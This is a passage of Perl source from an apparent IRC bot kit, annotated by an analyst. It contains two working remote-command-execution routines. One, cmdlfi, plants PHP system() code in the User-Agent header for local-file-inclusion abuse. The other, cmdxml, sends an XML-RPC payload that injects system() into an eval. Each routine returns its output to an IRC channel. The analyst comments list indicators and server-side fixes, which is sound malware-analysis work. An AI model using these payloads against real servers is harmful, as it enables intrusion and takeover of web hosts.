# accepts both forms cannot be confirmed from here.
sub notice() {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}
  2043.  
# cmdlfi(): operator command that sends one HTTP GET carrying a PHP snippet in
# the User-Agent header and reports whatever comes back between two markers.
# Input:  $_[0] - URL to request; $_[1] - command text placed inside the
#         snippet; $_[2] - IRC target for the result.
# Output: none; the result (or "No Output") is sent through msg().
# Analyst note - indicators visible in this routine:
#   * User-Agent header containing a PHP open tag and a system() call;
#   * the literal marker "j13mbut" at both ends of that header value and
#     around the command output in the response body;
#   * client timeout of 7 seconds, default LWP::UserAgent otherwise.
# The request only yields output where the requested page ends up interpreting
# text taken from the request as PHP (inferred from the sub name and the marker
# round trip - confirm); the fix belongs on that server: stop user-controlled
# include paths and keep request data out of files that can be included.
# NOTE(review): $response is an undeclared package variable.
sub cmdlfi() {
    my $browser = LWP::UserAgent->new;
    my $url = $_[0];
    my $cmd = $_[1];
    my $chan = $_[2];
    my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
    $browser->agent("$hie");
    $browser->timeout(7);
    $response = $browser->get( $url );
    # /s lets the capture span several lines of output.
    if ($response->content =~ /j13mbut(.*)j13mbut/s) {
        &msg("$chan","15,1(4@9CMDLFI15)9 $1");
    } else {
        &msg("$chan","15,1(4@9CMDLFI15)4 No Output");
    }
}
  2059.  
# cmdxml(): operator command that POSTs a crafted XML-RPC methodCall and
# reports whatever comes back between two markers.
# Input:  $_[0] - URL of the XML-RPC endpoint; $_[1] - command text placed
#         inside the request body; $_[2] - IRC target for the result.
# Output: none; the result (or "No Output") is sent through msg().
# Analyst note - indicators visible in this routine:
#   * POST with Content-Type text/xml and User-Agent "perl post";
#   * methodName "test.method" with a <name> value that breaks out of a quoted
#     string and calls system();
#   * the literal markers "bamby" and "solo" around the command output in the
#     response body.
# The body shape resembles the PHP XML-RPC code-injection class in which
# request values reach eval() - inferred, confirm; the fix on the server side
# is an XML-RPC library version that does not evaluate request data.
# NOTE(review): $exploit is an undeclared package variable.
sub cmdxml() {
    my $jed = $_[0];
    my $dwa = $_[1];
    my $chan = $_[2];
    my $userAgent = LWP::UserAgent->new(agent => 'perl post');
    $exploit = "<?xml version=\"1.0\"?><methodCall>";
    $exploit .= "<methodName>test.method</methodName>";
    $exploit .= "<params><param><value><name>',''));";
    $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
    my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
    # /s lets the capture span several lines of output.
    if ($response->content =~ /bamby(.*)solo/s) {
        &msg("$chan","15,1(4@9CMDXML15)9 $1");
    } else {
        &msg("$chan","15,1(4@9CMDXML15)4 No Output");
    }
}